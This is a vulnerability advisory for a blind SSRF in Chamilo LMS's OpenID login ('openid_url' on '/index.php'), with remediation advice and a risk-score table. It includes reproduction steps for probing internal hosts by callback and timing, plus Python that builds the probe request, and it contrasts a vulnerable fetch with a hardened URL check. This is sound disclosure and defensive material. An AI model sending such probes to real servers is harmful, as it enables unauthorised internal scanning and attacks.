Chamilo LMS Blind Server-Side Request Forgery Vulnerability

Vulnerability

A blind server-side request forgery (SSRF) vulnerability has been identified in Chamilo LMS versions prior to 1.11.30. The issue is in the OpenID login module, reached through '/index.php', where the POST parameter 'openid_url' is accepted without sufficient validation and used as the identifier that the server fetches during OpenID discovery. An attacker who can submit that parameter can therefore make the Chamilo server issue HTTP requests to hosts of their choosing, including internal resources that are not reachable from the attacker's own network position. The SSRF is blind: the content of the fetched response is not returned to the attacker, so what can be observed is whether the server connected (confirmed with an attacker-controlled listener), timing or error differences between reachable and unreachable targets, and any side effects the request has on the target. That is enough to scan internal networks, reach local services, cause denial-of-service conditions and, depending on the targeted service, disclose sensitive information indirectly.

Impact

Exploitation lets an attacker turn the Chamilo server into a request proxy toward external or internal resources. Because the SSRF is blind, the attacker does not receive the fetched content directly; the leak is the existence and timing of the outbound connection plus whatever side effects the request has on the target. That is sufficient to map internal hosts and ports, reach services that trust the web server's network position (including local-only services), and tie up server resources, causing denial of service. Direct disclosure of response data is not part of this issue; any further information disclosure depends on how the targeted service reacts to an unauthenticated request.

Reproduction

To reproduce this vulnerability, send a POST request to '/index.php' with the 'openid_url' parameter set to a URL on a host you control, for example a simple HTTP listener, and watch that listener for an inbound connection from the Chamilo server's address. Because the flaw is blind, the observed callback is the evidence of exploitation, not the HTTP response Chamilo returns to you. The same parameter can then be pointed at internal addresses or local services that the server can reach; those targets are probed by comparing response time or error behaviour for reachable versus unreachable hosts and ports. The request should be made with a 'User-Agent' that mimics a Chamilo client.
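The following is an added example, not Chamilo's own code and not the upstream fix, illustrating both the probe described in the Reproduction section and the validation the Vulnerability section says is missing. It builds the raw POST to '/index.php' with 'openid_url', simulates the unpatched behaviour (fetch whatever URL was supplied) against a loopback listener so the callback can be observed offline, and contrasts it with a check that rejects non-http(s) schemes, embedded credentials and hostnames resolving to non-public addresses. The hostnames, ports, callback path and User-Agent string are constructed for the demo; the exact User-Agent Chamilo sends is not given on this page.

```python
"""Added example (not Chamilo code): blind-SSRF probe vs. a validated OpenID URL fetch."""
import ipaddress
import socket
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlencode, urlsplit


def build_probe_request(host, openid_url, user_agent="Mozilla/5.0 (Chamilo LMS client)"):
    """Raw HTTP/1.1 request for the vector on this page: POST /index.php, openid_url parameter.

    The User-Agent value is an assumption; the page only says it should mimic a Chamilo client.
    """
    body = urlencode({"openid_url": openid_url})
    return (
        "POST /index.php HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {user_agent}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n{body}"
    )


def _is_blocked(addr):
    """Reject anything that is not a public unicast address (loopback, RFC1918, link-local, etc.)."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return not addr.is_global


def check_openid_url(url, resolver=None):
    """Return (ok, reason). `resolver(hostname)` -> iterable of IP strings; defaults to DNS."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        if resolver is None:
            ips = {info[4][0] for info in socket.getaddrinfo(parts.hostname, None)}
        else:
            ips = set(resolver(parts.hostname))
    except socket.gaierror:
        return False, "unresolvable host"
    for ip in ips:
        if _is_blocked(ipaddress.ip_address(ip.split("%")[0])):  # drop IPv6 scope id
            return False, f"{parts.hostname} resolves to non-public address {ip}"
    return True, "ok"


def vulnerable_fetch(url):
    """What the unpatched behaviour amounts to: fetch whatever the user supplied."""
    with urllib.request.urlopen(url, timeout=3) as resp:
        return resp.status


def hardened_fetch(url, resolver=None):
    """Same fetch, but only after the URL passes check_openid_url."""
    ok, reason = check_openid_url(url, resolver)
    if not ok:
        raise ValueError(reason)
    return vulnerable_fetch(url)


class _Listener(BaseHTTPRequestHandler):
    """Stand-in for the attacker's callback server; records every path it is asked for."""
    hits = []

    def do_GET(self):
        _Listener.hits.append(self.path)
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep the demo output quiet
        pass


def demo():
    """Start a loopback listener, show the vulnerable fetch hits it and the hardened one refuses."""
    srv = HTTPServer(("127.0.0.1", 0), _Listener)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    callback = f"http://127.0.0.1:{srv.server_port}/ssrf-probe"  # constructed callback URL
    try:
        vulnerable_fetch(callback)
        callback_seen = "/ssrf-probe" in _Listener.hits
        try:
            hardened_fetch(callback)
            refused = False
        except ValueError:
            refused = True
        return callback_seen, refused
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(build_probe_request("chamilo.example", "http://127.0.0.1:8000/ssrf-probe"))
    print("callback observed, hardened refused:", demo())
```

The check resolves the hostname itself rather than trusting the literal, so names that point at loopback or internal ranges are caught, not just IP literals. Two caveats a practitioner should keep in mind: a resolve-then-fetch check is still open to DNS rebinding unless the fetch is pinned to the address that was validated, and the check says nothing about redirects, so the fetch must also refuse to follow a redirect to an address that would have failed the same test.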

Remediation

Update to Chamilo LMS version 1.11.30 or later, where this vulnerability has been patched. Until the upgrade is applied, a deployment that does not use OpenID login can turn that login option off, which removes the reachable vector, and egress filtering from the web server toward internal ranges and cloud metadata addresses limits what a forged request can reach.

Added: Mar 2, 2026, 4:31 PM
Updated: Mar 2, 2026, 9:50 PM

Vulnerability Rating (Custom Algorithm)

  spread          3.4
  impact          1.7
  exploitability  8.1
  remediation     7.9
  relevance       3.4
  threat          1.6
  urgency         2.9
  incentive       8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.